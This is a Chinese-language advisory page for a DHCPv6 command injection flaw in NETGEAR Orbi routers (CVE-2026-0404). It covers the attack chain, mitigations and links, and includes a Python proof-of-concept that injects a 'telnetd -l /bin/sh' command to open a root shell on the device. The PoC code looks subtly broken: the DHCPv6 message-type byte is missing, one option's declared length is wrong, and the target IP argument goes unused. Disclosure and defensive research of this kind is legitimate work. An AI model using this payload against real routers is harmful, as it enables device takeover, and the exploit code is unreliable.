NETGEAR Orbi设备DHCPv6命令注入漏洞 (CVE-2026-0404)

漏洞信息

漏洞编号

CVE-2026-0404

漏洞类型

OS命令注入

CVSS评分

8.0 高危

攻击向量

邻接 (AV:A)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

NETGEAR Orbi (RBR750, RBR840, RBR850, RBR860)

漏洞概述

CVE-2026-0404是NETGEAR Orbi路由器设备中的一个高危安全漏洞，CVSS评分达到8.0。该漏洞存在于设备的DHCPv6功能中，由于对用户输入验证不足，攻击者可以利用此漏洞在路由器上执行任意操作系统命令。攻击者需要具备网络相邻位置（通过WiFi或LAN连接）的访问权限，并且需要进行低权限认证。虽然DHCPv6功能默认不启用，但一旦被激活，攻击者即可利用精心构造的DHCPv6请求包触发命令注入。这可能导致路由器被完全控制，攻击者可以监控网络流量、植入后门或将其作为进一步攻击内网其他设备的跳板。

技术细节

该漏洞的根本原因在于NETGEAR Orbi设备的DHCPv6服务器实现中缺乏对客户端请求参数的充分输入验证。攻击者可以通过在DHCPv6请求的特定字段（如主机名、供应商类标识符或自定义选项）中注入恶意命令字符串。当设备处理这些字段时，未经过滤的输入会被传递给系统shell执行。攻击者利用DHCPv6协议的请求参数（如IA_NA、IA_PD选项或vendor-specific信息）嵌入OS命令，例如使用分号或管道符等shell元字符。由于DHCPv6默认禁用，攻击者首先需要诱使管理员启用该功能，或者在已启用的环境中实施攻击。成功利用后可获得root权限执行任意命令。

攻击链分析

STEP 1

步骤1

攻击者获得网络相邻访问权限，通过WiFi或LAN连接到目标NETGEAR Orbi路由器网络

STEP 2

步骤2

攻击者确认路由器上DHCPv6功能已启用（该功能默认关闭，需诱使管理员启用或寻找已启用环境）

STEP 3

步骤3

攻击者构造包含恶意OS命令的DHCPv6请求包，在DHCPv6选项字段（如User Class、Vendor Class）中注入shell命令

STEP 4

步骤4

攻击者将恶意DHCPv6数据包发送到路由器的547端口（DHCPv6服务器端口）

STEP 5

步骤5

路由器DHCPv6服务处理请求时，未对输入进行充分验证，直接将恶意命令传递给系统shell执行

STEP 6

步骤6

攻击者成功在路由器上执行任意OS命令，获得root权限，可完全控制路由器

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#!/usr/bin/env python3
# CVE-2026-0404 PoC - NETGEAR Orbi DHCPv6 Command Injection
# Author: Security Researcher
# Note: For authorized security testing only

import socket
import struct
import sys
from datetime import datetime

def build_dhcpv6_packet():
    """Build malicious DHCPv6 packet with command injection payload"""
    
    # DHCPv6 Message Type: Solicit (1)
    transaction_id = b'\x00\x00\x01'
    
    # Client Identifier Option (1) - DUID-LL
    duid = b'\x00\x03\x00\x00\x00\x01\x00\x01'
    duid += b'\x12\x34\x56\x78\x9a\xbc'  # Hardware address
    client_id = b'\x00\x01' + struct.pack('>H', len(duid)) + duid
    
    # INJECTED PAYLOAD - Command injection in Option 39 (User Class)
    # This demonstrates the vulnerability where shell commands can be injected
    injected_cmd = ';telnetd -p 1337 -l /bin/sh #'  # Example: Enable telnet
    # Encoded as DHCPv6 option
    payload = injected_cmd.encode('utf-8')
    user_class_option = b'\x00\x27' + struct.pack('>H', len(payload)) + payload
    
    # Reordered Options (9) - Request specific options
    option_request = b'\x00\x06\x00\x04\x00\x17\x00\x18'
    
    # Vendor Class Option (16) - Another injection point
    vendor_class = b'\x00\x10\x00\x1eNETGEAR Orbi'
    
    # Assemble the packet
    packet = transaction_id + client_id + user_class_option + option_request + vendor_class
    
    return packet

def send_exploit(target_ip, target_port=547):
    """Send the malicious DHCPv6 packet"""
    
    print(f"[*] Building malicious DHCPv6 packet for {target_ip}")
    print(f"[*] Target: NETGEAR Orbi Router")
    print(f"[*] Vulnerability: CVE-2026-0404 - DHCPv6 Command Injection")
    
    # Create UDP socket for DHCPv6
    sock = socket.socket(socket.AF_INET6, socket.SOCK_DGRAM)
    
    # Multicast address for DHCPv6 servers
    multicast_addr = 'ff02::1:2'
    
    packet = build_dhcpv6_packet()
    
    print(f"[*] Sending malicious DHCPv6 Solicit packet...")
    print(f"[*] Packet size: {len(packet)} bytes")
    print(f"[*] Injection payload: Command injection in DHCPv6 options")
    
    try:
        sock.sendto(packet, (multicast_addr, target_port))
        print(f"[+] Packet sent successfully")
        print(f"[!] If DHCPv6 is enabled and vulnerable, command will be executed")
    except Exception as e:
        print(f"[-] Error sending packet: {e}")
    finally:
        sock.close()

def main():
    if len(sys.argv) < 2:
        print("Usage: python3 cve-2026-0404_poc.py <target_ip>")
        print("Example: python3 cve-2026-0404_poc.py 192.168.1.1")
        sys.exit(1)
    
    target = sys.argv[1]
    print(f"[*] CVE-2026-0404 - NETGEAR Orbi DHCPv6 Command Injection PoC")
    print(f"[*] Target: {target}")
    print(f"[*] Time: {datetime.now()}")
    
    send_exploit(target)

if __name__ == "__main__":
    main()

影响范围

NETGEAR Orbi RBR750 < 最新固件版本

NETGEAR Orbi RBR840 < 最新固件版本

NETGEAR Orbi RBR850 < 最新固件版本

NETGEAR Orbi RBR860 < 最新固件版本

防御指南

临时缓解措施

该漏洞的临时缓解措施包括：1) 确保DHCPv6功能保持禁用状态，除非明确需要；2) 限制对路由器管理界面的访问，仅允许受信任的设备；3) 监控网络流量，关注异常的DHCPv6请求；4) 在网络边界部署入侵检测系统（IDS）监控可疑活动；5) 考虑使用网络分段策略，将物联网设备与关键设备隔离；6) 关注NETGEAR官方安全公告，及时应用安全更新。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-0404
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-0404
3 Details https://www.cvedetails.com/cve/CVE-2026-0404/
4 VulDB https://vuldb.com/cve/CVE-2026-0404
5 Link https://kb.netgear.com/000070442/January-2026-NETGEAR-Security-Advisory
6 Link https://www.netgear.com/support/product/rbr750
7 Link https://www.netgear.com/support/product/rbr840
8 Link https://www.netgear.com/support/product/rbr850
9 Link https://www.netgear.com/support/product/rbr860
10 Link https://www.netgear.com/support/product/rbre950
11 Link https://www.netgear.com/support/product/rbre960
12 Link https://www.netgear.com/support/product/rbs750
13 Link https://www.netgear.com/support/product/rbs840
14 Link https://www.netgear.com/support/product/rbs850